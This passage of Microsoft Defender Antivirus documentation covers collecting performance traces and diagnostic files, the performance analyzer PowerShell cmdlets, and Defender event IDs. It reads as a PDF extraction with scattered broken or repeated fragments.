
measurement Microsoft Defender for Endpoint analysis for large servers
instead of Microsoft Defender for Endpoint analysis . Otherwise, your system
could consume a high amount of non-paged pool memory or buffers which
can lead to system instability. You can choose which profiles to add by
expanding Resource Analysis. This custom profile provides the necessary
context for in-depth performance analysis.
8. To use the custom measurement Microsoft Defender for Endpoint verbose analysis
profile in the WPR UI:
a. Ensure no profiles are selected under the First-level triage, Resource Analysis and
Scenario Analysis groups.
b. Select Custom measurements.
c. Select Microsoft Defender for Endpoint analysis.
d. Select Verbose under Detail level.
e. Select File or Memory under Logging mode.
） Important
You should select File to use the file logging mode if the performance issue
can be reproduced directly by the user. Most issues fall under this category.
However, if the user cannot directly reproduce the issue but can easily notice
it once the issue occurs, the user should select Memory to use the memory
logging mode. This ensures that the trace log will not inflate excessively due
to the long run time.
9. Now you're ready to collect data. Exit all the applications that are not relevant to
reproducing the performance issue. You can select Hide options to keep the space
occupied by the WPR window small.
 Tip
Try starting the trace at whole number seconds. For instance, 01:30:00. This
will make it easier to analyze the data. Also try to keep track of the timestamp
of exactly when the issue is reproduced.
10. Select Start.
11. Reproduce the issue.
 Tip
Keep the data collection to no more than five minutes. Two to three minutes
is a good range since a lot of data is being collected.
12. Select Save.
13. Fill up Type in a detailed description of the problem: with information about the
problem and how you reproduced the issue.

a. Select File Name: to determine where your trace file will be saved. By default, it
is saved to %user%\Documents\WPR Files\ .
b. Select Save.
14. Wait while the trace is being merged.
15. Once the trace is saved, select Open folder.


Include both the file and the folder in your submission to Microsoft Support.
Capture performance logs using the WPR CLI

The command-line tool wpr.exe is part of the operating system starting with Windows 8.
To collect a WPR trace using the command-line tool wpr.exe:
1. Download Microsoft Defender for Endpoint analysis profile for performance

traces to a file named MDAV.wprp in a local directory such as C:\traces .
2. Right-click the Start Menu icon and select Windows PowerShell (Admin) or
Command Prompt (Admin) to open an Admin command prompt window.
3. When the User Account Control dialog box appears, select Yes.
4. At the elevated prompt, run the following command to start a Microsoft Defender
for Endpoint performance trace:
Console
wpr.exe -start C:\traces\MDAV.wprp!WD.Verbose -filemode
２ Warning
If your Windows Server has 64 GB or RAM or more, use profiles

WDForLargeServers.Light and WDForLargeServers.Verbose instead of profiles
WD.Light and WD.Verbose , respectively. Otherwise, your system could
consume a high amount of non-paged pool memory or buffers which can

lead to system instability.
5. Reproduce the issue.
 Tip
Keep the data collection no to more than five minutes. Depending on the
scenario, two to three minutes is a good range since a lot of data is being
collected.
6. At the elevated prompt, run the following command to stop the performance
trace, making sure to provide information about the problem and how you
reproduced the issue:
Console
wpr.exe -stop merged.etl "Timestamp when the issue was reproduced, in

HH:MM:SS format" "Description of the issue" "Any error that popped up"
7. Wait until the trace is merged.
8. Include both the file and the folder in your submission to Microsoft support.
 Tip

 Tip


top scans per file
See also
Collect Microsoft Defender Antivirus diagnostic data
Configure and validate exclusions for Microsoft Defender Antivirus scans
 Tip
Feedback

Troubleshoot Microsoft Defender
Antivirus reporting in Update
Compliance
Article • 02/22/2023
Applies to:

Platforms
Windows
） Important
On March 31, 2020, the Microsoft Defender Antivirus reporting feature of Update
Compliance will be removed. You can continue to define and review security
compliance policies using Microsoft Intune family of products , which allows
finer control over security features and updates.
You can use Microsoft Defender Antivirus with Update Compliance. You'll see status for
E3, B, F1, VL, and Pro licenses. However, for E5 licenses, you need to use the Microsoft
Defender for Endpoint portal. To learn more about licensing options, see Windows 10
product licensing options .
When you use Windows Analytics Update Compliance to obtain reporting into the
protection status of devices or endpoints in your network that are using Microsoft
Defender Antivirus, you might encounter problems or issues.
Typically, the most common indicators of a problem are:
You only see a small number or subset of all the devices you were expecting to see
You do not see any devices at all
The reports and information you do see is outdated (older than a few days)
For common error codes and event IDs related to the Microsoft Defender Antivirus
service that are not related to Update Compliance, see Microsoft Defender Antivirus
events.
There are three steps to troubleshooting these problems:
1. Confirm that you have met all prerequisites

2. Check your connectivity to the Windows Defender cloud-based service
3. Submit support logs
） Important
It typically takes 3 days for devices to start appearing in Update Compliance.
Confirm prerequisites
In order for devices to properly show up in Update Compliance, you have to meet
certain prerequisites for both the Update Compliance service and for Microsoft
Defender Antivirus:
＂ Endpoints are using Microsoft Defender Antivirus as the sole antivirus protection
app. Using any other antivirus app will cause Microsoft Defender Antivirus to
disable itself and the endpoint will not be reported in Update Compliance.
＂ Cloud-delivered protection is enabled.
＂ Endpoints can connect to the Microsoft Defender Antivirus cloud
＂ If the endpoint is running Windows 10 version 1607 or earlier, Windows 10
diagnostic data must be set to the Enhanced level.
＂ It has been 3 days since all requirements have been met
"You can use Microsoft Defender Antivirus with Update Compliance. You'll see status for
E3, B, F1, VL, and Pro licenses. However, for E5 licenses, you need to use the Microsoft
Defender for Endpoint portal (/windows/security/threat-protection/microsoft-defender-
atp/configure-endpoints). To learn more about licensing options, see Windows 10
product licensing options"
If the above prerequisites have all been met, you might need to proceed to the next
step to collect diagnostic information and send it to us.
Collect diagnostic data for Update Compliance troubleshooting
 Tip

 Tip


top scans per file
Related topics
 Tip
Feedback

Collect Microsoft Defender Antivirus
diagnostic data
Article • 02/02/2024
Applies to:

This article describes how to collect diagnostic data that's used by Microsoft support
and engineering teams when they help troubleshoot issues with Microsoft Defender
Antivirus.
７ Note
As part of the investigation or response process, you can collect an investigation

package from a device. Here's how: Collect investigation package from devices.

Performance analyzer for Microsoft Defender Antivirus.
Get the diagnostic files

On at least two devices that are experiencing the same issue, obtain the .cab diagnostic
file by taking the following steps:
1. Open Command Prompt as an administrator by following these steps:
a. Open the Start menu.
b. Type cmd. Right-click on Command Prompt and then select Run as

administrator.
c. Specify administrator credentials or approve the prompt.
2. Navigate to the directory for Microsoft Defender Antivirus. By default, it's

C:\Program Files\Windows Defender .
７ Note
If you're running an updated Microsoft Defender antimalware platform
version , run MpCmdRun from the following location:
C:\ProgramData\Microsoft\Windows Defender\Platform\<version> .
3. Type the following command, and then press Enter
Dos
mpcmdrun.exe -GetFiles
4. A .cab file is generated that contains various diagnostic logs. The location of the
file is specified in the output in the command prompt. By default, the location is
C:\ProgramData\Microsoft\Windows Defender\Support\MpSupportFiles.cab .
７ Note
To redirect the cab file to a different path or UNC share, use the following
command:
mpcmdrun.exe -GetFiles -SupportLogLocation <path>
For more information, see Redirect diagnostic data to a UNC share.
5. Copy these .cab files to a location that can be accessed by Microsoft support. An
example could be a password-protected OneDrive folder that you can share with
us.
７ Note
If you have a problem with Update compliance, send an email using the Update
Compliance support email template, and fill out the template with the following
information:
I am encountering the following issue when using Microsoft Defender Antivirus in

Update Compliance:
I have provided at least 2 support .cab files at the following location:
<accessible share, including access details such as password>
My OMS workspace ID is:

Please contact me at:
Redirect diagnostic data to a UNC share

To collect diagnostic data on a central repository, you can specify the
SupportLogLocation parameter.
Dos
mpcmdrun.exe -GetFiles -SupportLogLocation <path>
Copies the diagnostic data to the specified path. If the path isn't specified, the
diagnostic data is copied to the location specified in the Support Log Location
Configuration.
When the SupportLogLocation parameter is used, a folder structure like as follows will
be created in the destination path:
Dos
<path>\<MMDD>\MpSupport-<hostname>-<HHMM>.cab
ﾉ Expand table
field Description
path The path as specified on the command line or retrieved from configuration
MMDD Month and day when the diagnostic data was collected (for example, 0530)
hostname The hostname of the device on which the diagnostic data was collected
HHMM Hours and minutes when the diagnostic data was collected (for example, 1422)
７ Note
When using a file share please make sure that account used to collect the
diagnostic package has write access to the share.
Specify location where diagnostic data is

created
You can also specify where the diagnostic .cab file is created using a Group Policy
Object (GPO).
1. Open the Local Group Policy Editor and find the SupportLogLocation GPO at:
Defender\SupportLogLocation .
2. Select Define the directory path to copy support log files.




3. Inside the policy editor, select Enabled.
4. Specify the directory path where you want to copy the support log files in the
Options field.

5. Select OK or Apply.
 Tip


top scans per file
See also
Troubleshoot Microsoft Defender Antivirus reporting
 Tip
Feedback

Collect update compliance diagnostic
data for Microsoft Defender Antivirus
assessment
Article • 08/22/2023
Applies to:

This article describes how to collect diagnostic data that's used by Microsoft support
and engineering teams when they help with troubleshooting issues with Microsoft
Defender Antivirus.
７ Note

Performance analyzer for Microsoft Defender Antivirus.
Before attempting this process, ensure you have read Troubleshoot Microsoft Defender
Antivirus reporting, met all require prerequisites, and taken any other suggested
troubleshooting steps.
Obtain the diagnostic file

On at least two devices that aren't reporting or showing up in Update Compliance,
obtain the .cab diagnostic file by taking the following steps:
1. Open Command Prompt as an administrator by following these steps:
a. Open the Start menu.
b. Type cmd. Right-click on Command Prompt and then select Run as

administrator.
c. Specify administrator credentials or approve the prompt.
2. Navigate to the Windows Defender directory. By default, it's C:\Program

Files\Windows Defender .
3. Type the following command, and then press Enter
Dos
mpcmdrun -getfiles
4. A .cab file is generated that contains various diagnostic logs. The location of the
file is specified in the output in the command prompt. By default, the location is
5. Copy the .cab files to a location that can be accessed by Microsoft support. An
example could be a password-protected OneDrive folder that you can share.
6. Send an email using the update compliance support email template, and fill out
the template with the following information:
text
I am encountering the following issue when using Microsoft Defender

Antivirus in Update Compliance:
I have provided at least 2 support .cab files at the following

location: <accessible share, including access details such as password>
My OMS workspace ID is:
Please contact me at:
See also
Troubleshoot Microsoft Defender Antivirus reporting
 Tip
Feedback
Was this page helpful?
 Yes  No

Performance analyzer for Microsoft
Defender Antivirus
Article • 02/16/2024
Applies to

Platforms
Windows
Requirements
Microsoft Defender Antivirus performance analyzer has the following prerequisites:
Supported Windows versions: Windows 10, Windows 11, Windows 2012 R2 with
the Modern Unified Solution and Windows Server 2016 and above
Platform Version: 4.18.2108.7 or later
PowerShell Version: PowerShell Version 5.1, PowerShell ISE, remote PowerShell
(4.18.2201.10+), PowerShell 7.x (4.18.2201.10+)
What is Microsoft Defender Antivirus

performance analyzer?
If computers running Microsoft Defender Antivirus are experiencing performance issues,
you can use performance analyzer to improve the performance of Microsoft Defender
Antivirus. Performance analyzer for Microsoft Defender Antivirus in Windows 10,
Windows 11, and Windows Server, is a PowerShell command-line tool that helps you
determine files, file extensions, and processes that might be causing performance issues
on individual endpoints during antivirus scans. You can use the information gathered by
performance analyzer to assess performance issues and apply remediation actions.
Similar to the way mechanics perform diagnostics and service on a vehicle that has
performance problems, performance analyzer can help you improve Defender Antivirus
performance.

Some options to analyze include:

top scans per file
Running performance analyzer

The high-level process for running performance analyzer involves the following steps:
1. Run performance analyzer to collect a performance recording of Microsoft

Defender Antivirus events on the endpoint.
７ Note
Performance of Microsoft Defender Antivirus events of the type Microsoft-

Antimalware-Engine are recorded through the performance analyzer.
2. Analyze the scan results using different recording reports.
Using performance analyzer

To start recording system events, open PowerShell in administrative mode and perform
the following steps:
1. Run the following command to start the recording:
PowerShell
New-MpPerformanceRecording -RecordTo <recording.etl>
where -RecordTo parameter specifies full path location in which the trace file is
saved. For more cmdlet information, see Microsoft Defender Antivirus cmdlets.
2. If there are processes or services thought to be affecting performance, reproduce

the situation by carrying out the relevant tasks.
3. Press ENTER to stop and save recording, or Ctrl+C to cancel recording.
4. Analyze the results using the performance analyzer's Get-MpPerformanceReport

parameter. For example, on executing the command Get-MpPerformanceReport -
Path <recording.etl> -TopFiles 3 -TopScansPerFile 10 , the user is provided with a
list of top-ten scans for the top three files affecting performance.
For more information on command-line parameters and options, see the New-
MpPerformanceRecording and Get-MpPerformanceReport.
７ Note
When running a recording, if you get the error "Cannot start performance
recording because Windows Performance Recorder is already recording", run the
following command to stop the existing trace with the new command: wpr -cancel
-instancename MSFT_MpPerformanceRecording
Performance tuning data and information

Based on the query, the user is able to view data for scan counts, duration
(total/min/average/max/median), path, process, and reason for scan. The following
image shows sample output for a simple query of the top 10 files for scan impact.

Additional functionality: exporting and

converting to CSV and JSON
The results of the performance analyzer can also be exported and converted to a CSV or
JSON file. For examples that describe the process of "export" and "convert" through
sample codes, see the following sections.
Starting with Defender version 4.18.2206.X , users are able to view scan skip reason
information under "SkipReason" column. The possible values are:
Not Skipped
Optimization (typically due to performance reasons)
User skipped (typically due to user-set exclusions)
For CSV
To export:
PowerShell
(Get-MpPerformanceReport -Path .\Repro-Install.etl -Topscans 1000).TopScans

| Export-CSV -Path .\Repro-Install-Scans.csv -Encoding UTF8 -
NoTypeInformation
To convert:
PowerShell
(Get-MpPerformanceReport -Path .\Repro-Install.etl -Topscans 100).TopScans |

ConvertTo-Csv -NoTypeInformation
For JSON
To convert:
PowerShell
(Get-MpPerformanceReport -Path .\Repro-Install.etl -Topscans 1000).TopScans

| ConvertTo-Json -Depth 1
To ensure machine-readable output for exporting with other data processing systems,
it's recommended to use -Raw parameter for Get-MpPerformanceReport . See the
following sections for more details.
PowerShell reference
There are two new PowerShell cmdlets used to tune performance of Microsoft Defender
Antivirus:
New-MpPerformanceRecording
Get-MpPerformanceReport
New-MpPerformanceRecording
The following section describes the reference for the new PowerShell cmdlet New-
MpPerformanceRecording. This cmdlet Collects a performance recording of Microsoft
Syntax: New-MpPerformanceRecording
PowerShell
New-MpPerformanceRecording -RecordTo <String>
Description: New-MpPerformanceRecording
The New-MpPerformanceRecording cmdlet collects a performance recording of Microsoft

Defender Antivirus scans. These performance recordings contain Microsoft-
Antimalware-Engine and NT kernel process events and can be analyzed after collection
using the Get-MpPerformanceReport cmdlet.
This New-MpPerformanceRecording cmdlet provides an insight into problematic files that

could cause a degradation in the performance of Microsoft Defender Antivirus. This tool
is provided "AS IS", and isn't intended to provide suggestions on exclusions. Exclusions
can reduce the level of protection on your endpoints. Exclusions, if any, should be
defined with caution.
For more information on the performance analyzer, see Performance Analyzer docs.
） Important
This cmdlet requires elevated administrator privileges.
Examples: New-MpPerformanceRecording
Example 1: Collect a performance recording and save it
PowerShell
New-MpPerformanceRecording -RecordTo .\Defender-scans.etl
The above command collects a performance recording and saves it to the specified
path: .\Defender-scans.etl.
Example 2: Collect a performance recording for remote PowerShell

session
PowerShell
$s = New-PSSession -ComputerName Server02 -Credential Domain01\User01

New-MpPerformanceRecording -RecordTo C:\LocalPathOnServer02\trace.etl -
Session $s
The above command collects a performance recording on Server02 (as specified by

argument $s of parameter Session) and saves it to the specified path:
C:\LocalPathOnServer02\trace.etl on Server02.
Parameters: New-MpPerformanceRecording
-RecordTo
Specifies the location in which to save the Microsoft Defender Antimalware performance
recording.
YAML
Type: String
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
-Session
Specifies the PSSession object in which to create and save the Microsoft Defender
Antivirus performance recording. When you use this parameter the RecordTo parameter
refers to the local path on the remote machine. Available with Defender platform
version 4.18.2201.10.
YAML
Type: PSSession[]
Position: 0
Default value: None
Get-MpPerformanceReport
The following section describes the Get-MpPerformanceReport PowerShell cmdlet.
Analyzes and reports on Microsoft Defender Antivirus performance recording.
Syntax: Get-MpPerformanceReport
Output
Get-MpPerformanceReport [-Path] <String>

[-TopScans [<Int32>]]
[-TopPaths [<Int32>] [-TopPathsDepth [<Int32>]]]
[-TopScansPerPath [<Int32>]]
[-TopFilesPerPath [<Int32>]
[-TopScansPerFilePerPath [<Int32>]]
]
[-TopExtensionsPerPath [<Int32>]
[-TopScansPerExtensionPerPath [<Int32>]]
]
[-TopProcessesPerPath [<Int32>]
[-TopScansPerProcessPerPath [<Int32>]]
]
]
[-TopFiles [<Int32>]
[-TopScansPerFile [<Int32>]]
[-TopProcessesPerFile [<Int32>]
[-TopScansPerProcessPerFile [<Int32>]]
]
]
[-TopExtensions [<Int32>]
[-TopScansPerExtension [<Int32>]
[-TopPathsPerExtension [<Int32>] [-TopPathsDepth [<Int32>]]
[-TopScansPerPathPerExtension [<Int32>]]
]
[-TopProcessesPerExtension [<Int32>]
[-TopScansPerProcessPerExtension [<Int32>]]
]
[-TopFilesPerExtension [<Int32>]
[-TopScansPerFilePerExtension [<Int32>]]
]
]
[-TopProcesses [<Int32>]
[-TopScansPerProcess [<Int32>]]
[-TopExtensionsPerProcess [<Int32>]
[-TopScansPerExtensionPerProcess [<Int32>]]
]
[-TopPathsPerProcess [<Int32>] [-TopPathsDepth [<Int32>]]
[-TopScansPerPathPerProcess [<Int32>]]
]
[-TopFilesPerProcess [<Int32>]
[-TopScansPerFilePerProcess [<Int32>]]
]
]
[-MinDuration <String>]
[-Raw]
Description: Get-MpPerformanceReport
The Get-MpPerformanceReport cmdlet analyzes a previously collected Microsoft Defender
Antivirus performance recording (New-MpPerformanceRecording) and reports the file
paths, file extensions, and processes that cause the highest impact to Microsoft
The performance analyzer provides an insight into problematic files that could cause a
degradation in the performance of Microsoft Defender Antivirus. This tool is provided
"AS IS" and isn't intended to provide suggestions on exclusions. Exclusions can reduce
the level of protection on your endpoints. Exclusions, if any, should be defined with
caution.
For more information on the performance analyzer, see Performance Analyzer docs.
Supported OS versions:
Windows Version 10 and later.
７ Note
This feature is available starting with platform version 4.18.2108.X and later.
Examples: Get-MpPerformanceReport
Example 1: Single query
PowerShell
Get-MpPerformanceReport -Path .\Defender-scans.etl -TopScans 20
Example 2: Multiple queries
PowerShell
Get-MpPerformanceReport -Path .\Defender-scans.etl -TopFiles 10 -

TopExtensions 10 -TopProcesses 10 -TopScans 10
Example 3: Nested queries
PowerShell
Get-MpPerformanceReport -Path .\Defender-scans.etl -TopProcesses 10 -

TopExtensionsPerProcess 3 -TopScansPerExtensionPerProcess 3
Example 4: Using -MinDuration parameter
PowerShell
Get-MpPerformanceReport -Path .\Defender-scans.etl -TopScans 100 -

MinDuration 100ms
Example 5: Using -Raw parameter
PowerShell
Get-MpPerformanceReport -Path .\Defender-scans.etl -TopFiles 10 -
TopExtensions 10 -TopProcesses 10 -TopScans 10 -Raw | ConvertTo-Json
Using -Raw in the above command specifies that the output should be machine
readable and readily convertible to serialization formats like JSON.
Parameters: Get-MpPerformanceReport
-TopPaths
Requests a top-paths report and specifies how many top paths to output, sorted by
Duration. Aggregates the scans based on their path and directory. User can specify how
many directories should be displayed on each level and the depth of the selection.
YAML
- Type: Int32
- Position: Named
- Default value: None
- Accept pipeline input: False
- Accept wildcard characters: False
-TopPathsDepth
Specifies recursive depth that is used to group and display aggregated path results. For
example "C:" corresponds to a depth of 1, "C:\Users\Foo" corresponds to a depth of 3.
This flag can accompany all other Top Path options. If missing, a default value of 3 is
assumed. Value can't be 0.
YAML
- Type: Int32
- Position: Named
- Default value: 3
- Accept pipeline input: False
- Accept wildcard characters: False
ﾉ Expand table
flag definition
-TopScansPerPath Specifies how many top scans to specify for each top path.
flag definition
-TopFilesPerPath Specifies how many top files to specify for each top path.
-TopScansPerFilePerPath Specifies how many top scans to output for each top file for
each top path, sorted by "Duration"
-TopExtensionsPerPath Specifies how many top extensions to output for each top path
- Specifies how many top scans to output for each top extension
TopScansPerExtensionPerPath for each top path
-TopProcessesPerPath Specifies how many top processes to output for each top path
-TopScansPerProcessPerPath Specifies how many top scans to output for each top process for
each top path
-TopPathsPerExtension Specifies how many top paths to output for each top extension
- Specifies how many top scans to output for each top path for
TopScansPerPathPerExtension each top extension
-TopPathsPerProcess Specifies how many top paths to output for each top process
-TopScansPerPathPerProcess Specifies how many top scans to output for each top path for
each top process
-MinDuration
Specifies the minimum duration of any scan or total scan durations of files, extensions,
and processes included in the report; accepts values like 0.1234567sec, 0.1234ms, 0.1us,
or a valid TimeSpan.
YAML
Type: String
Position: Named
Default value: None
-Path
Specifies the path or paths to one or more locations.
YAML
Type: String
Position: 0
Default value: None
Accept pipeline input: True
-Raw
Specifies that output of performance recording should be machine readable and readily
convertible to serialization formats like JSON (for example, via Convert-to-JSON
command). This configuration is recommended for users interested in batch processing
with other data processing systems.
YAML
Type: <SwitchParameter>
Position: Named
Default value: False
-TopExtensions
Specifies how many top extensions to output, sorted by Duration.
YAML
Type: Int32
Position: Named
Default value: None
-TopExtensionsPerProcess
Specifies how many top extensions to output for each top process, sorted by Duration.
YAML
Type: Int32
Position: Named
Default value: None
-TopFiles
Requests a top-files report and specifies how many top files to output, sorted by
Duration.
YAML
Type: Int32
Position: Named
Default value: None
-TopFilesPerExtension
Specifies how many top files to output for each top extension, sorted by Duration.
YAML
Type: Int32
Position: Named
Default value: None
-TopFilesPerProcess
Specifies how many top files to output for each top process, sorted by Duration.
YAML
Type: Int32
Position: Named
Default value: None
-TopProcesses
Requests a top-processes report and specifies how many of the top processes to output,
sorted by Duration.
YAML
Type: Int32
Position: Named
Default value: None
-TopProcessesPerExtension
Specifies how many top processes to output for each top extension, sorted by Duration.
YAML
Type: Int32
Position: Named
Default value: None
-TopProcessesPerFile
Specifies how many top processes to output for each top file, sorted by Duration.
YAML
Type: Int32
Position: Named
Default value: None
-TopScans
Requests a top-scans report and specifies how many top scans to output, sorted by
Duration.
YAML
Type: Int32
Position: Named
Default value: None
-TopScansPerExtension
Specifies how many top scans to output for each top extension, sorted by Duration.
YAML
Type: Int32
Position: Named
Default value: None
-TopScansPerExtensionPerProcess
Specifies how many top scans to output for each top extension for each top process,
sorted by Duration.
YAML
Type: Int32
Position: Named
Default value: None
-TopScansPerFile
Specifies how many top scans to output for each top file, sorted by Duration.
YAML
Type: Int32
Position: Named
Default value: None
-TopScansPerFilePerExtension
Specifies how many top scans to output for each top file for each top extension, sorted
by Duration.
YAML
Type: Int32
Position: Named
Default value: None
-TopScansPerFilePerProcess
Specifies how many top scans for output for each top file for each top process, sorted
by Duration.
YAML
Type: Int32
Position: Named
Default value: None
-TopScansPerProcess
Specifies how many top scans to output for each top process in the Top Processes
report, sorted by Duration.
YAML
Type: Int32
Position: Named
Default value: None
-TopScansPerProcessPerExtension
Specifies how many top scans for output for each top process for each top extension,
sorted by Duration.
YAML
Type: Int32
Position: Named
Default value: None
-TopScansPerProcessPerFile
Specifies how many top scans for output for each top process for each top file, sorted
by Duration.
YAML
Type: Int32
Position: Named
Default value: None
If you're looking for Antivirus-related information for other platforms, see:

Configure Defender for Endpoint on Android features- Configure Microsoft
Defender for Endpoint on iOS features
 Tip
Feedback

Review event logs and error codes
to troubleshoot issues with
FAQ
If you encounter a problem with Microsoft Defender Antivirus, you can search the below
sections in this article to find a matching issue and potential solution.
Applies to:

How do I view a Microsoft Defender

Antivirus event?
1. Open Event Viewer.
2. In the console tree, expand Applications and Services Logs > Microsoft >
Windows > Windows Defender.
3. Double-click on Operational.
4. In the details pane, view the list of individual events to find your event.
5. Select the event to see specific details about an event in the lower pane, under the
General and Details tabs.
Event ID 1000
Symbolic name: MALWAREPROTECTION_SCAN_STARTED
Message: An antimalware scan started.
Description:
Scan ID: ID number of the relevant scan.
Scan Type: Scan type. Examples: Antivirus, Antispyware, or Antimalware

Scan Parameters: Scan parameters. Examples: Full scan, Quick scan, or Customer
scan
Scan Resources: Resources (such as files/directories/BHO) that were scanned.
User: Domain\User
Event ID 1001
Symbolic name: MALWAREPROTECTION_SCAN_COMPLETED
Message: An antimalware scan finished.
Description:
scan
User: Domain\User
Scan Time: The duration of a scan.
Event ID 1002
Symbolic name: MALWAREPROTECTION_SCAN_CANCELLED
Message: An antimalware scan was stopped before it finished.
Description:
scan
User: Domain\User
Scan Time: The duration of a scan.

Event ID 1003
Symbolic name: MALWAREPROTECTION_SCAN_PAUSED
Message: An antimalware scan was paused.
Description:
scan
User: Domain\User
Event ID 1004
Symbolic name: MALWAREPROTECTION_SCAN_RESUMED
Message: An antimalware scan was resumed.
Description:
scan
User: Domain\User
Event ID 1005
Symbolic name: MALWAREPROTECTION_SCAN_FAILED
Message: An antimalware scan failed.
Description:

Scan Parameters: Scan parameters. Examples: Full scan, Quick scan, or Custom scan
User: Domain\User
Error Code: Error code. Result code associated with threat status. Standard
HRESULT values.
Error Description: Error description. Description of the error.
User action:
The antivirus client encountered an error, and the current scan stopped. The scan might
fail due to a client-side issue. This event record includes the scan ID, type of scan
(Microsoft Defender Antivirus, antispyware, antimalware), scan parameters, the user that
started the scan, the error code, and a description of the error. To troubleshoot this
event:
- Run the scan again.
- If it fails in the same way, go to the [Microsoft Support site]

(https://support.microsoft.com/), enter the error number in the Search box
to look for the error code.
- Contact [Microsoft Technical Support](/microsoft-365/admin/get-help-

support).
Event ID 1006
Symbolic name: MALWAREPROTECTION_MALWARE_DETECTED
Message: The antimalware engine found malware or other potentially unwanted

software.
Description: For more information, see the following details:
Name: Threat name
ID: Threat ID
Severity: Severity. Examples: Low, Moderate, High, or Severe
Category: Category description. Examples: Any threat or malware type.
Path: File path

Detection Origin: Detection origin. Examples: Unknown, Local computer, Network
share, Internet, Incoming traffic, or Outgoing traffic
Detection Type: Detection type. Examples: Heuristics, Generic, Concrete, or

Dynamic signature
Detection Source: Detection source for example:
User: user initiated
System: system initiated
Real-time: real-time component initiated
IOAV: IE Downloads and Outlook Express Attachments initiated
NIS: Network inspection system
IEPROTECT: IE - IExtensionValidation; this protects against malicious webpage

controls.
Early Launch Antimalware (ELAM). This source includes malware detected by the
boot sequence.
Remote attestation
Antimalware Scan Interface (AMSI). Primarily used to protect scripts (PowerShell,

VBS), though it can be invoked by third parties as well. UAC.
Status: Status
User: Domain\User
Process Name: Process in the PID
Signature Version: Definition version
Engine Version: Antimalware Engine version
Event ID 1007
Symbolic name: MALWAREPROTECTION_MALWARE_ACTION_TAKEN
Message: The antimalware platform performed an action to protect your system from
malware or other potentially unwanted software.
Description: Microsoft Defender Antivirus took action to protect this machine from
malware or other potentially unwanted software. For more information, see the
following details:
User: Domain\User
Name: Threat name
ID: Threat ID
Category: Category description, for example, any threat or malware type.
Action: Action. Examples:
Clean: The resource was cleaned.
Quarantine: The resource was quarantined.
Remove: The resource was deleted.
Allow: The resource was allowed to execute/exist.
User defined: User-defined action that's typically from this list of actions
specified by the user.
No action: No action
Block: The resource was blocked from executing.
Status: Status
Event ID 1008
Symbolic name: MALWAREPROTECTION_MALWARE_ACTION_FAILED
Message: The antimalware platform attempted to perform an action to protect your

system from malware or other potentially unwanted software, but the action failed.
Description: Microsoft Defender Antivirus encountered an error when taking action on

following details:
User: Domain\User
Name: Threat name
ID: Threat ID
Path: File path
Error Code: Error code Result code associated with threat status. Standard HRESULT
values.
Error Description: Error description Description of the error.
Status: Status
Event ID 1009
Symbolic name: MALWAREPROTECTION_QUARANTINE_RESTORE
Message: The antimalware platform restored an item from quarantine.
Description: Microsoft Defender Antivirus restored an item from quarantine. For more
information, see the following details:
Name: Threat name
ID: Threat ID
Path: File path
User: Domain\User
Event ID 1010
Symbolic name: MALWAREPROTECTION_QUARANTINE_RESTORE_FAILED
Message: The antimalware platform couldn't restore an item from quarantine.
Description: Microsoft Defender Antivirus encountered an error trying to restore an item

from quarantine. For more information, see the following details:
Name: Threat name
ID: Threat ID
Path: File path
User: Domain\User
values.
Event ID 1011
Symbolic name: MALWAREPROTECTION_QUARANTINE_DELETE
Message: The antimalware platform deleted an item from quarantine.
Description: Microsoft Defender Antivirus deleted an item from quarantine. For more
Name: Threat name
ID: Threat ID
Path: File path
User: Domain\User
Event ID 1012
Symbolic name: MALWAREPROTECTION_QUARANTINE_DELETE_FAILED
Message: The antimalware platform couldn't delete an item from quarantine.
Description: Microsoft Defender Antivirus encountered an error trying to delete an item

from quarantine. For more information, see the following details:
Name: Threat name
ID: Threat ID
Path: File path
User: Domain\User
values.

Event ID 1013
Symbolic name: MALWAREPROTECTION_MALWARE_HISTORY_DELETE
Message: The antimalware platform deleted history of malware and other potentially
unwanted software.
Description: Microsoft Defender Antivirus removed history of malware and other

potentially unwanted software.
Time: The time when the event occurred, for example when the history is purged.
This parameter isn't used in threat events so that there's no confusion regarding
whether it's remediation time or infection time. For such events, we specifically call
them as Action Time or Detection Time.
User: Domain\User
Event ID 1014
Symbolic name: MALWAREPROTECTION_MALWARE_HISTORY_DELETE_FAILED
Message: The antimalware platform couldn't delete history of malware and other
Description: Microsoft Defender Antivirus encountered an error trying to remove history

of malware and other potentially unwanted software.
Time: The time when the event occurred, for example when the history is purged.
This parameter isn't used in threat events so that there's no confusion regarding
whether it's remediation time or infection time. For such events, we specifically call
them as Action Time or Detection Time.
User: Domain\User
values.

Event ID 1015
Symbolic name: MALWAREPROTECTION_BEHAVIOR_DETECTED
Message: The antimalware platform detected suspicious behavior.
Description: Microsoft Defender Antivirus detected a suspicious behavior. For more

Name: Threat name
ID: Threat ID
Path: File path


Dynamic signature
IEPROTECT: IE - IExtensionValidation; this source protects against malicious

webpage controls.
Early Launch Antimalware (ELAM). This source includes malware detected by the
boot sequence.
Remote attestation

VBS), though it can be invoked by third parties as well. UAC
Status: Status
User: Domain\User
Signature ID: Enumeration matching severity.
Fidelity Label:
Target File Name: File name Name of the file.
Event ID 1116
Symbolic name: MALWAREPROTECTION_STATE_MALWARE_DETECTED
Message: The antimalware platform detected malware or other potentially unwanted

software.
Description: Microsoft Defender Antivirus detected malware or other potentially

unwanted software. For more information, see the following details:
Name: Threat name
ID: Threat ID
Path: File path


Dynamic signature


controls.
Early Launch Antimalware (ELAM). This includes malware detected by the boot
sequence.
Remote attestation

User: Domain\User
User action: No action is required. Microsoft Defender Antivirus can suspend and take
routine action on this threat. If you want to remove the threat manually, in the Microsoft
Defender Antivirus interface, select Clean Computer.
Event ID 1117
Symbolic name: MALWAREPROTECTION_STATE_MALWARE_ACTION_TAKEN
Message: The antimalware platform performed an action to protect your system from
malware or other potentially unwanted software.
Description: Microsoft Defender Antivirus took action to protect this machine from
following details:
Name: Threat name
ID: Threat ID

Path: File path


Dynamic signature
IEPROTECT: IE - IExtensionValidation; this source protects against malicious

webpage controls.
sequence.
Remote attestation

User: Domain\User

Action Status: Description of other actions
values.
NOTE: Whenever Microsoft Defender Antivirus, Microsoft Security Essentials, Malicious

Software Removal Tool, or System Center Endpoint Protection detects a malware, it
restores the following system settings and services that might have been changed by
the malware:
- Default Internet Explorer or Microsoft Edge setting
- User Access Control settings
- Chrome settings
- Boot Control Data
- Regedit and Task Manager registry settings
- Windows Update, Background Intelligent Transfer Service, and Remote

Procedure Call service
- Windows Operating System files
The above context applies to the following client and server versions:
- Operating system: Client Operating System
